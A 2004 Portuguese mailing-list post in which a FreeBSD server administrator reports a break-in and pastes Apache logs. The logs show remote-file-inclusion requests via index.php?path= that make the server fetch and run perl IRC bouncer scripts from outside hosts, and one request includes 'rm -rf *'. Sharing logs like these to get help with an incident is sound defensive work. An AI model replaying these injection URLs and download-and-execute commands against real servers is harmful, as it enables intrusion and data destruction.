Olah pessoal, Um do servidores aqui estah sendo acessado remotamente por um individuo que, de alguma maneira que desconheco, vem executando comandos via http, utilizando-se do usuario www. Recentemente ele baixou e rodou diversos scripts em perl, como bncs por exemplo. Encontrei ainda outros arquivos, como exploits para php, binario de linux no /tmp e em diretorios do website hospedado.
Vejam o log do apache: httpd-access.log:shasta069242.ig.com.br - - [02/Jul/2004:22:15:04 -0300] "GET /*protegido*/index.php?path=http://www.packetx.org/cmd.gif?&cmd=uname%20-a;cd%20/tmp%20;%20fetch%20http://ircmortos.hpg.ig.com.br/psybnc.perl%20;%20perl%20psybnc.perl%208888%20;%20rm%20-rf%20* HTTP/1.1" 200 5000 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - - [08/Jul/2004:22:08:03 -0300] "GET /*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;wget%20http://geocities.yahoo.com.br/malapunk/bnc.pl.txt HTTP/1.1" 200 4269 "-" "iexplore.exe" httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - - [08/Jul/2004:22:08:04 -0300] "GET /*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;wget%20http://geocities.yahoo.com.br/malapunk/bnc.pl.txt HTTP/1.1" 200 4269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - - [08/Jul/2004:22:08:12 -0300] "GET /*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;ftp%20http://geocities.yahoo.com.br/malapunk/bnc.pl.txt HTTP/1.1" 200 4269 "-" "iexplore.exe" httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - - [08/Jul/2004:22:08:14 -0300] "GET /*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;ftp%20http://geocities.yahoo.com.br/malapunk/bnc.pl.txt HTTP/1.1" 200 4269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - - [08/Jul/2004:22:08:35 -0300] "GET /*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;perl%20bnc.pl.txt%2044444 HTTP/1.1" 200 4269 "-" "iexplore.exe" httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - - [08/Jul/2004:22:08:36 -0300] "GET /*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;perl%20bnc.pl.txt%2044444 HTTP/1.1" 200 4360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - - [08/Jul/2004:22:09:22 -0300] "GET /*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;perl%20bnc.pl.txt%202525 HTTP/1.1" 200 4269 "-" "iexplore.exe" httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - - [08/Jul/2004:22:09:23 -0300] "GET /*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;perl%20bnc.pl.txt%202525 HTTP/1.1" 200 4359 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" httpd-access.log:waverouter.censa.com.br - - [09/Jul/2004:19:53:08 -0300] "GET /*protegido*/index.php?path=http://www.packetx.org/cmd.gif?&cmd=cd%20/tmp;fetch%20http://farpador.com/bnc.pl HTTP/1.0" 200 4496 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" httpd-access.log:waverouter.censa.com.br - - [09/Jul/2004:19:53:14 -0300] "GET /*protegido*/index.php?path=http://www.packetx.org/cmd.gif?&cmd=cd%20/tmp;perl%20bnc.pl%208000 HTTP/1.0" 200 4427 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" httpd-access.log:waverouter.censa.com.br - - [09/Jul/2004:19:53:35 -0300] "GET /*protegido*/index.php?path=http://www.packetx.org/cmd.gif?&cmd=cd%20/tmp;perl%20bnc.pl%208080 HTTP/1.0" 200 4504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" httpd-access.log:201009221110.user.veloxzone.com.br - - [12/Jul/2004:16:55:31 -0300] "GET /*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg?&cmd=cd%20/tmp;perl%20bnc.pl%206666 HTTP/1.1" 200 4269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322)" httpd-access.log:201009221110.user.veloxzone.com.br - - [12/Jul/2004:16:56:21 -0300] "GET /*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg?&cmd=cd%20/tmp;perl%20bnc.pl%208080 HTTP/1.1" 200 4269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322)" httpd-access.log:201009221110.user.veloxzone.com.br - - [12/Jul/2004:16:59:42 -0300] "GET /*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg?&cmd=perl%20/tmp/bnc.pl%2080 HTTP/1.1" 200 4269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322)" httpd-error.log:N�o consegui escutar na porta 8888: Address already in use at psybnc.perl line 128. Verifiquei o arquivo /*protegido*/index.php e eh o php original do site hospedado no servidor. Alguem sabe o que pode estar possibilitando isso? Poderia ser por causa a variavel register_globals do php, que deixei habilitada devido a problemas com o Uebimiau e com o Squirrelmail? Dados: apache-1.3.31_2 The extremely popular Apache http server. Very fast, very mod_php4-4.3.4_2,1 PHP Apache Module FreeBSD 5.2.1 Qualquer ajuda eh muito bem vinda, Um abraco, Martin Augusto ________________________________________________ Message sent using Mail Newsite 2004 _______________________________________________________________ Para enviar um novo email para a lista: [EMAIL PROTECTED] Sair da Lista: http://lists.fugspbr.org/listinfo.cgi Historico: http://www4.fugspbr.org/lista/html/FUG-BR/
